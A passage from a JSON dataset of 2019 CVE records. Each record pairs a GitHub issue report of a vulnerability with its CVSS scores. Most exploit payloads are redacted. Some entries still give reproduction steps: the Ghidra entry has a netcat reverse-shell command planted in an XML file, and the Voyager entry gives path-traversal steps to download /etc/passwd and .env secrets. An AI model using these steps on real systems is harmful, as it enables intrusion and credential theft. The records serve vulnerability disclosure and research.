        "description": "Memory corruption (free on invalid pointer) while parsing DTLS messages. APITAG DTLS server (in versions NUMBERTAG Open and NUMBERTAG Open) incorrectly handles incoming network messages leading to memory corruption issue, resulting in crash of the server. Proposed CVSS NUMBERTAG score NUMBERTAG APITAG PATHTAG Error message WITHOUT Address Sanitizer: matrixssl NUMBERTAG open$ PATHTAG p NUMBERTAG DTLS server running on port NUMBERTAG Select woke NUMBERTAG Sent NUMBERTAG bytes Select woke NUMBERTAG Got REQUEST_RECV from APITAG Select woke NUMBERTAG Error in PATHTAG APITAG invalid pointer NUMBERTAG ae NUMBERTAG Backtrace: ========= PATHTAG NUMBERTAG e5) FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16748",
        "Issue_Url_old": "https://github.com/wolfSSL/wolfssl/issues/2459",
        "Issue_Url_new": "https://github.com/wolfssl/wolfssl/issues/2459",
        "Repo_new": "wolfssl/wolfssl",
        "Issue_Created_At": "2019-09-10T10:29:02Z",
        "description": "Heap overread bug in checking cert signature. Hi, another heap overread bug which could be triggerd remotely tested on APITAG NUMBERTAG ubuntu NUMBERTAG clang /gcc / asan / generate Makefile with ./configure enable lowresource Missing sanity checks before APITAG PATHTAG CODETAG You could trigger it through following steps NUMBERTAG start wolfss example server program under directory \"examples/server\" by invoking: ./server b p NUMBERTAG start py script client_raw.py which sends crafted messages to local port NUMBERTAG FILETAG ASAN report ( if examples/server is compiled with asan ): ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16751",
        "Issue_Url_old": "https://github.com/lynndylanhurley/devise_token_auth/issues/1332",
        "Issue_Url_new": "https://github.com/lynndylanhurley/devise_token_auth/issues/1332",
        "Repo_new": "lynndylanhurley/devise_token_auth",
        "Issue_Created_At": "2019-08-22T15:52:55Z",
        "description": "XSS and Open Redirect. Version : APITAG Routes : APITAG Description : The omniauth failure endpoint is vulnerable to Reflected XSS through the message parameter. Unauthenticated attackers can craft a URL that executes a malicious APITAG payload in the victim\u2019s browser. The same endpoint is also vulnerable to an Open Redirect through the auth_origin_url parameter. Unauthenticated attackers can craft a URL that sends users to a malicious site to phish credentials or launch additional attacks. URLs to reproduce : The following URL should trigger a JS alert with the XSS message. APITAG The following URL should redirect to google. APITAG Reason : The APITAG method and APITAG methods in APITAG are using untrusted input to build the redirect and render the error message. Remediation : Redirect to a pre configured auth_origin_url value and do not trust user input. Use templates that sanitize/escape HTML in rendered params by default or utilize FILETAG to sanitize the message parameter in place.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16867",
        "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/12",
        "Issue_Url_new": "https://github.com/neeke/hongcms/issues/12",
        "Repo_new": "neeke/hongcms",
        "Issue_Created_At": "2019-09-23T09:19:45Z",
        "description": "APITAG NUMBERTAG Arbitrary file deletion and reinstall APITAG U need log into manage page and request this page:\u201c URLTAG \u201d. and POST file parameter file= APITAG if u delete FILETAG and view FILETAG , u will reinstall this cms! like this: CODETAG let's view source code: local PATHTAG line NUMBERTAG to line NUMBERTAG ar $action from $_GET[\"action\"] var $filename from $_POST[\"file\"]",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16868",
        "Issue_Url_old": "https://github.com/emlog/emlog/issues/48",
        "Issue_Url_new": "https://github.com/emlog/emlog/issues/48",
        "Repo_new": "emlog/emlog",
        "Issue_Created_At": "2019-09-25T05:43:34Z",
        "description": "emlog has any file deletion vulnerability. vulnerability in FILETAG line NUMBERTAG ERRORTAG post any filepath as \"bak\" , will delete it. Login management background and view APITAG POST bak=anyfile,like FILETAG something. POC: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16869",
        "Issue_Url_old": "https://github.com/netty/netty/issues/9571",
        "Issue_Url_new": "https://github.com/netty/netty/issues/9571",
        "Repo_new": "netty/netty",
        "Issue_Created_At": "2019-09-16T17:55:33Z",
        "description": "http request smuggling, cause by obfuscating TE header. Expected behavior ignore obfuscating TE APITAG Encoding : chunked\" vs APITAG Encoding: chunked\") Actual behavior use Transfer Encoding[space] as Transfer Encoding Steps to reproduce NUMBERTAG topology: APITAG NUMBERTAG client send a request with both content length and trunked encoded[space NUMBERTAG elb ignored trunked encoded[space], but use content length NUMBERTAG netty use trunked encoded[space] Minimal yet complete reproducer code (or URL to code) when header field end with space but not colon, shoud the space be ignored? can not found proof in URLTAG code in APITAG APITAG APITAG for APITAG = APITAG APITAG APITAG APITAG APITAG ) { break; } } APITAG Netty version all JVM version (e.g. APITAG ) OS version (e.g. ERRORTAG )",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16884",
        "Issue_Url_old": "https://github.com/opencontainers/runc/issues/2128",
        "Issue_Url_new": "https://github.com/opencontainers/runc/issues/2128",
        "Repo_new": "opencontainers/runc",
        "Issue_Created_At": "2019-09-22T13:15:28Z",
        "description": "APITAG can be bypassed by a malicious image that specifies a volume at /proc. A malicious volume can specify a volume mount on APITAG . Since Docker populates the volume by copying data present in the image, it's possible to build a fake structure that will trick into runc into believing it had successfully written to APITAG : URLTAG This is possible because APITAG is executed in the container rootfs, after pivot_root in APITAG URLTAG APITAG is supposed to prevent mounting on top of APITAG : URLTAG ... but the check does not work. I believe the reason is that the dest argument is resolved to an absolute path using APITAG (before pivot_root), unlike the blacklist in APITAG which is relative to the rootfs: URLTAG Minimal proof of concept (on Ubuntu NUMBERTAG ERRORTAG Not a critical bug on its own, but should get a CVE assigned. Discovered by Adam Iwaniuk and disclosed during APITAG CTF ( URLTAG The CTF challenge mounted a file to APITAG and denied access to it using an APITAG policy. The bug could then be used to disable the policy and read the file: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16890",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/311",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/311",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2019-09-25T08:14:17Z",
        "description": "Storage XSS vulnerabilities in article reviews. Enter at the Write Comments Screenshots : FILETAG After the request is successful. View in the background. For the comment list, click jack NUMBERTAG APITAG XSS vulnerability will be launched. APITAG Hackers can steal APITAG APITAG of privileges is APITAG Token Payload CODETAG APITAG APITAG APITAG The reason for the vulnerability is an error in APITAG parameter filtering APITAG CODETAG Ask the author to fix this APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-16903",
        "Issue_Url_old": "https://github.com/plutinosoft/Platinum/issues/22",
        "Issue_Url_new": "https://github.com/plutinosoft/platinum/issues/22",
        "Repo_new": "plutinosoft/platinum",
        "Issue_Created_At": "2019-07-22T09:26:54Z",
        "description": "APITAG have APITAG Vulnerability. I audit the code and found a problem\uff0cthe problem code is PATHTAG NUMBERTAG ERRORTAG the function to prevent pathtraversal is not enough\uff1a APITAG NUMBERTAG in the APITAG line NUMBERTAG the function APITAG CODETAG we know if victim's root directory is\uff1a PATHTAG if an attacker post a GET request as\uff1a FILETAG the variable \"file_path\" is \".. APITAG and the filter function APITAG could not match \"../\" so cause APITAG Vulnerability we suggest the code as fallows: if APITAG NUMBERTAG APITAG NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16904",
        "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2685",
        "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2685",
        "Repo_new": "nilsteampassnet/teampass",
        "Issue_Created_At": "2019-09-25T14:06:24Z",
        "description": "Stored XSS in previous password field. Steps to reproduce NUMBERTAG Add a new item to any folder, set a password with XSS payload: ERRORTAG NUMBERTAG Edit the previous saved item, change the password to any you want NUMBERTAG Reload the page. That's all... we can tap to the item and XSS payload will be executed (because there isn't any filtration in previous used passwords field). Besides, XSS payload will be executed if you try to look at the change history. So we have two places where there isn't any filtration. An attacker can share the item to admin and get admin's cookie for example. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-16923",
        "Issue_Url_old": "https://github.com/wangyifani/kkcms/issues/2",
        "Issue_Url_new": "https://github.com/wangyifani/kkcms/issues/2",
        "Repo_new": "wangyifani/kkcms",
        "Issue_Created_At": "2019-09-27T08:23:53Z",
        "description": "jx.php url parameter has xss vulnerability. Xss vulnerability payload\uff1aurl=\"> APITAG APITAG alert NUMBERTAG APITAG \" FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-16941",
        "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/1090",
        "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/1090",
        "Repo_new": "nationalsecurityagency/ghidra",
        "Issue_Created_At": "2019-09-28T13:09:07Z",
        "description": "RCE possible in Function Bit Patterns Explorer Plugin. Description: APITAG is used in APITAG which causes a allows Remote Code Execution in the Bit Patterns Explorer Plugin. Steps to reproduce the behavior NUMBERTAG Open a binary with APITAG NUMBERTAG Go to Window APITAG Manager and select the APITAG NUMBERTAG Export the resulted XML file NUMBERTAG Add the following at the end of the file, after the closing tag of the last object and before the APITAG closing tag: APITAG APITAG APITAG nc APITAG NUMBERTAG c PATHTAG APITAG APITAG APITAG NUMBERTAG Open local listening server with : \"nc lvnp NUMBERTAG Go to Window APITAG Bit Patterns Explorer (you will need to enable experimental mode from configuration first File APITAG NUMBERTAG In the opened plugin window, click APITAG XML Files\", point to the directory where the XML file was saved and click OK NUMBERTAG Go back to the listener and see the shell opened. Expected behavior No code should be executed while running this plugin. Environment: OS: Kali Linu NUMBERTAG Java Version NUMBERTAG Ghidra Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16942",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2478",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2478",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2019-09-27T15:44:21Z",
        "description": "Block two new serialization gadgets . Hi, there. Recently, I found two new gadgets can be used to exploit jackson which can cause RCE vulnerability. I had sent the report to EMAILTAG . Cheers!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16992",
        "Issue_Url_old": "https://github.com/keybase/keybase-issues/issues/3583",
        "Issue_Url_new": "https://github.com/keybase/keybase-issues/issues/3583",
        "Repo_new": "keybase/keybase-issues",
        "Issue_Created_At": "2019-09-29T21:01:23Z",
        "description": "Keybase iOS has a backdoor that signs proofs against my knowledge and consent. URLTAG I don't want XLM shitcoins. I don't want anyone to send me XLM shitcoins thinking I want them. I don't hold any private keys for XLM shitcoins. Somehow, an attestation URLTAG has found its way onto my profile, signed by one of my devices by the Keybase iOS client. I did not want this signature generated with my keys. Indeed, it happened without my knowledge or consent. I am unable to revoke this from my keybase profile.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-16996",
        "Issue_Url_old": "https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/1",
        "Issue_Url_new": "https://github.com/xiaokuoai/xiaokuoai.github.io/issues/1",
        "Repo_new": "XiaOkuoAi/XiaOkuoAi.github.io",
        "Issue_Created_At": "2019-09-29T13:07:55Z",
        "description": "Metinfocms NUMBERTAG SQL\u6ce8\u5165\uff08\u6700\u65b0\u7248\u672c)\u7b2c\u4e00\u679a. \u4e8c\u3001\u6f0f\u6d1e\u6982\u8ff0 \u5168\u5c40\u641c\u7d22 where PATHTAG ERRORTAG \u53d1\u73b0 APITAG \u76f4\u63a5\u88ab\u62fc\u63a5\u8fdbsql\u8bed\u53e5\uff0c\u4e14 listid \u662f\u51fd\u6570\u76f4\u63a5\u4f20\u8fdb\u6765\u7684\u53c2\u6570\uff0c\u641c\u7d22\u54ea\u4e9b\u51fd\u6570\u8c03\u7528\u4e86\u8fd9\u4e2a\u51fd\u6570 FILETAG \u4e09\u3001\u5229\u7528\u4ee3\u7801 POC: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-16997",
        "Issue_Url_old": "https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/2",
        "Issue_Url_new": "https://github.com/xiaokuoai/xiaokuoai.github.io/issues/2",
        "Repo_new": "XiaOkuoAi/XiaOkuoAi.github.io",
        "Issue_Created_At": "2019-09-29T13:08:51Z",
        "description": "Metinfocms NUMBERTAG SQL\u6ce8\u5165\uff08\u6700\u65b0\u7248\u672c\uff09\u7b2c\u4e8c\u679a. \u4e8c\u3001\u6f0f\u6d1e\u6982\u8ff0 PATHTAG ERRORTAG APITAG \u76f4\u63a5\u62fc\u63a5 \u5f53 site \u7b49\u4e8eweb\u6216\u8005admin\u65f6\u9020\u6210sql\u6ce8\u5165 \u627e\u4e0b\u6709\u6ca1\u6709\u8c03\u7528\u8fd9\u4e2a\u51fd\u6570\u4f20\u53c2\u7684 PATHTAG ERRORTAG \u770b\u4e0b\u4ee3\u7801\uff0c\u9996\u5148\u8981\u4f20\u9012\u53c2\u6570 editor \u8df3\u51fa\u7b2c\u4e00\u4e2aif\u8bed\u53e5\u5757\uff0c\u7136\u540e site \u548c appno \u76f4\u63a5\u4f20\u5165 APITAG \u51fd\u6570\uff0c\u53c2\u6570\u90fd\u53ef\u63a7\uff0c\u59a5\u59a5\u7684\u6ce8\u5165\u3002 payload ERRORTAG APITAG FILETAG \u4e09\u3001\u5229\u7528\u4ee3\u7801 POC: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-16999",
        "Issue_Url_old": "https://github.com/idcos/Cloudboot/issues/22",
        "Issue_Url_new": "https://github.com/idcos/cloudboot/issues/22",
        "Repo_new": "idcos/cloudboot",
        "Issue_Created_At": "2019-09-05T10:19:46Z",
        "description": "Cloudboot has SQL injection. A sql injection was discovered in cloudboot There is a sql injection vulnerability which allows remote attackers to inject sql command of PATHTAG APITAG POST PATHTAG HTTP NUMBERTAG Host: example.com Content Type: application/x www form urlencoded Content Length NUMBERTAG APITAG by NUMBERTAG APITAG APITAG is the injection point Use sqlmap to get the database FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17050",
        "Issue_Url_old": "https://github.com/the-control-group/voyager/issues/4322",
        "Issue_Url_new": "https://github.com/the-control-group/voyager/issues/4322",
        "Repo_new": "the-control-group/voyager",
        "Issue_Created_At": "2019-08-08T02:14:59Z",
        "description": "Security: critical vulnurability in Voyager Compass. Version information Laravel NUMBERTAG oyager NUMBERTAG PHP NUMBERTAG Database: APITAG NUMBERTAG Description During pentesting some projects, i found critical vulnerability in Voyager Compass. This vulnerability can give to anyone, who has permission to use compass, power of download and delete every file in the system if the user has permission for this operation in the system. This means, bad guy can steal .env file of your application and sign his own new session and cookie with secret application key or just drop your database knowing username and password of the database. How can you reproduce it? It's very easy. Voyager Compass has two GET parameters: download and del. They are used for download and deleting error logs in the directory 'logs'. If you want to read or delete file out of this directory you can't just type absolute path to this file, because this feature was fixed. To bypass this, you have to use path traversal trick. Now you make a get request like \" URLTAG {download/del}=path_to_file\", where path to file is base NUMBERTAG encode path in format like PATHTAG e.g. i want to download very sensitive file /etc/passwd, so i construct path to it with path traversal trick PATHTAG in base NUMBERTAG encode APITAG and now i can download passwd from the server: \" URLTAG \". Another example is .env file of your application. You can easily download it with \"../.env\" path to it. Request to it is: \" URLTAG \". Same thing with del parameter to delete this files from server: \" URLTAG \" and \" URLTAG \". You can do this with any file on the server. How to fix it This vulnerability has a high criticality and a CVSS score estimate to NUMBERTAG For fix it, i recommend check is the final directory of the path is directory, that existing in the logs directory.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-17073",
        "Issue_Url_old": "https://github.com/emlog/emlog/issues/49",
        "Issue_Url_new": "https://github.com/emlog/emlog/issues/49",
        "Repo_new": "emlog/emlog",
        "Issue_Created_At": "2019-09-30T01:32:34Z",
        "description": "emlog discover any file deletion vulnerability again!. vulnerability in FILETAG line NUMBERTAG ERRORTAG > if (true === APITAG . APITAG tracking APITAG function: ERRORTAG Unrestricted character \u201c../\u201d Login management background and view APITAG PATHTAG &token=U login token! POC: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17074",
        "Issue_Url_old": "https://github.com/dayrui/xunruicms/issues/2",
        "Issue_Url_new": "https://github.com/dayrui/xunruicms/issues/2",
        "Repo_new": "dayrui/xunruicms",
        "Issue_Created_At": "2019-09-30T08:34:15Z",
        "description": "There is a stored xss in module_category\uff08\u680f\u76ee\u7ba1\u7406\uff09. FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-17091",
        "Issue_Url_old": "https://github.com/eclipse-ee4j/mojarra/issues/4556",
        "Issue_Url_new": "https://github.com/eclipse-ee4j/mojarra/issues/4556",
        "Repo_new": "eclipse-ee4j/mojarra",
        "Issue_Created_At": "2019-04-03T14:29:47Z",
        "description": "HIGH LEVEL VULNERABILITY WITHIN ORACLE MOJARRA JSF NUMBERTAG This is a security bug. Please fix it in accordance with: PATHTAG Dear Oracle team, SEC Consult is a leading consulting company for information security. During a short security crash test we have found a high level security vulnerability within Oracle Mojarra JSF NUMBERTAG The encrypted security advisory with proof of concept information is attached. I have also attached my public PGP and S/MIME keys for further encrypted communication. Please provide us with an estimate on when the vulnerability will be fixed in order to set the actual release date. Please keep us informed if there are any changes. Please also see our attached responsible disclosure policy (PDF) which defines the process of publication of the security advisory. The security advisory will be released according to the chapter NUMBERTAG phase NUMBERTAG APITAG disclosure\", the latest possible release date is NUMBERTAG days from now NUMBERTAG Keep in mind that we can't give any other free support besides providing the security advisory information. Best regards, Jean Benjamin Rousseau Security Consultant",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17104",
        "Issue_Url_old": "https://github.com/centreon/centreon/issues/7097",
        "Issue_Url_new": "https://github.com/centreon/centreon/issues/7097",
        "Repo_new": "centreon/centreon",
        "Issue_Created_At": "2019-01-02T18:12:45Z",
        "description": "[security] Unsecured Cookies. APITAG BUG REPORT INFORMATION OS: Centreon Central NUMBERTAG el7 Vulnerability The Apache configuration deployed in the Centreon virtual machine does not protect cookies against eavesdropping nor XSS exfiltrations. The flag APITAG would prevent an attacker from stealing eavesdropping on the network, although it would only work if HTTPS was globally enabled which isn't the case right now. The flag APITAG would prevent an attacker from stealing the cookie via a XSS by forbidding APITAG to read cookies.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17106",
        "Issue_Url_old": "https://github.com/centreon/centreon/issues/7098",
        "Issue_Url_new": "https://github.com/centreon/centreon/issues/7098",
        "Repo_new": "centreon/centreon",
        "Issue_Created_At": "2019-01-02T18:44:09Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17175",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/443",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/443",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2019-09-03T07:20:02Z",
        "description": "joyplus cms Cross directory access FILETAG . describe You can view files in other directories across directories url: URLTAG FILETAG Code audit FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17177",
        "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/5645",
        "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/5645",
        "Repo_new": "freerdp/freerdp",
        "Issue_Created_At": "2019-10-04T11:51:58Z",
        "description": "Potential Memory Leaks on APITAG Dear APITAG I would like to report a potential memory leak on APITAG The problem occurs on the way realloc is being used. When a size bigger than the chunk that wants to be reallocated is passed, realloc try to malloc a bigger size, however in the case that malloc fails (for example, by forcing a big allocation) realloc will return NULL. According to the man page: APITAG APITAG function returns a pointer to the newly allocated memory, which is suitably aligned for any built in type and may be different from ptr, or NULL if the request fails. If size was equal to NUMBERTAG either NULL or a pointer suitable to be passed to APITAG is returned. If APITAG fails, the original block is left untouched; it is not freed or moved.\" The problem occurs when the memory ptr passed to the first argument of realloc is the same as the one used for the result, for example in this case: PATHTAG NUMBERTAG int APITAG = sizeof(REGION NUMBERTAG DATA) + APITAG sizeof(RECTANGLE NUMBERTAG region >data = realloc(region >data, APITAG If the malloc inside that realloc fails, then the original memory chunk will never be free but since realloc will return NULL, the pointer to that memory chunk will be lost and a memory leak will occur. We found other NUMBERTAG cases, all could be found here: URLTAG APITAG case where xrealloc should be disregarded since abort is being called on fail) Best Regards, Nico Waisman Semmle Security Team",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17188",
        "Issue_Url_old": "https://github.com/fecshop/yii2_fecshop/issues/77",
        "Issue_Url_new": "https://github.com/fecshop/yii2_fecshop/issues/77",
        "Repo_new": "fecshop/yii2_fecshop",
        "Issue_Created_At": "2019-08-28T16:33:19Z",
        "description": "Found unrestricted file upload vulnerability. What steps will reproduce the problem? Login the admin page and find a place to upload APITAG image. Intercept the request, change the file extension to APITAG and insert the content of webshell: FILETAG APITAG FILETAG Additional info | Q | A | | | Fecshop version NUMBERTAG PHP version NUMBERTAG Operating system APITAG NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-17203",
        "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2690",
        "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2690",
        "Repo_new": "nilsteampassnet/teampass",
        "Issue_Created_At": "2019-09-30T11:50:49Z",
        "description": "Stored XSS at Search page. Steps to reproduce NUMBERTAG Add a new item to any folder, set a password with XSS payload: ERRORTAG NUMBERTAG Open Search Page, find and click at the item NUMBERTAG That's all. The XSS payload will be triggered. In fact, it will be triggered an infinite number of times if you click on the show password icon. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-17204",
        "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2689",
        "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2689",
        "Repo_new": "nilsteampassnet/teampass",
        "Issue_Created_At": "2019-09-30T11:38:35Z",
        "description": "Stored XSS in KBs field. Steps to reproduce NUMBERTAG Open Knowledge Base, tap on Add a new KB NUMBERTAG Set XSS payload as label name: ERRORTAG NUMBERTAG Add any available item which you want to \"infect NUMBERTAG That's all. Anyone who click at the item will trigger XSS payload FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-17205",
        "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2688",
        "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2688",
        "Repo_new": "nilsteampassnet/teampass",
        "Issue_Created_At": "2019-09-30T11:18:56Z",
        "description": "Stored XSS in log of Failed Logins. Steps to reproduce NUMBERTAG Try to login with any password and username like: ERRORTAG NUMBERTAG When an Administrator will see a log of Failed Logins, XSS payload will be executed APITAG version NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17210",
        "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/11802",
        "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/11802",
        "Repo_new": "armmbed/mbed-os",
        "Issue_Created_At": "2019-11-04T02:48:00Z",
        "description": "The bug of APITAG MQTT. Description of defect URL: URLTAG URLTAG Upstream URL: URLTAG URLTAG The MQTT library is used to receive, parse and send mqtt packet between a broker and a client. The function APITAG is called by the function APITAG to get the length and content of the MQTT topic name. It parses the MQTT input linearly. Once a type length value tuple is parsed, the index is increased correspondingly. The maximum index is restricted by the length of the received packet size, as shown in line NUMBERTAG of the code snippet below. ERRORTAG Note that mqttstring >lenstring.len is a part of user input, which can be manipulated. An attacker can simply change it to a larger value to invalidate the if statement so that the statements from line NUMBERTAG to NUMBERTAG are skipped, leaving the value of mqttstring APITAG default to zero. Later, the value of mqttstring APITAG is assigned to curn (line NUMBERTAG of the code snippet below), which is zero under the attack. In line NUMBERTAG curn is accessed. In an ARM cortex M chip, the value at address NUMBERTAG is actually the initialization value for the MSP register. It is highly dependent on the actual firmware. Therefore, the behavior of the program is unpredictable from this time on. ERRORTAG A malformed MQTT packet may cause unexpected behaviors depending on the value stored at the address zero on the 